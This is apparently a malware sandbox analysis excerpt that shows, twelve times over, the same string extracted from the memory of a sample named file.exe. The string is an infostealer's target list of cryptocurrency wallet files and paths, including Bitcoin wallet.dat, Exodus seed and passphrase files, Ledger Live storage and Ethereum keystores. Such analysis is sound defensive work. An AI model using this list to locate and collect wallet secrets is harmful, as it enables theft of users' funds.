                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
